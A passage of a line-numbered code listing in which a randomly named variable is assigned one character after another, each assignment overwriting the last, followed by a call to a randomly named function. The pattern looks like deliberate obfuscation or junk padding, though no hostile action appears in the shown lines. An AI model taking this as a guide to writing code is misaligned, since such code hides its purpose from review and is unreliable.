1541 | ndzlnjcyq = "L"; | |
1542 | ndzlnjcyq = "X"; | |
1543 | ndzlnjcyq = "w"; | |
1544 | ndzlnjcyq = "W"; | |
1545 | ndzlnjcyq = "Y"; | |
1546 | ndzlnjcyq = "s"; | |
1547 | ndzlnjcyq = "O"; | |
1548 | ndzlnjcyq = "N"; | |
1549 | ndzlnjcyq = "d"; | |
1550 | ndzlnjcyq = "h"; | |
1551 | ndzlnjcyq = "W"; | |
1552 | ndzlnjcyq = "r"; | |
1553 | ndzlnjcyq = "L"; | |
1554 | ndzlnjcyq = "L"; | |
1555 | ndzlnjcyq = "F"; | |
1556 | ndzlnjcyq = "h"; | |
1557 | ndzlnjcyq = "j"; | |
1558 | ndzlnjcyq = "O"; | |
1559 | ndzlnjcyq = "x"; | |
1560 | ndzlnjcyq = "E"; | |
1561 | ndzlnjcyq = "s"; | |
1562 | ndzlnjcyq = "m"; | |
1563 | ndzlnjcyq = "S"; | |
1564 | ndzlnjcyq = "P"; | |
1565 | ndzlnjcyq = "S"; | |
1566 | ndzlnjcyq = "N"; | |
1567 | ndzlnjcyq = "T"; | |
1568 | ndzlnjcyq = "/"; | |
1569 | eqsafqfv ( ); |
|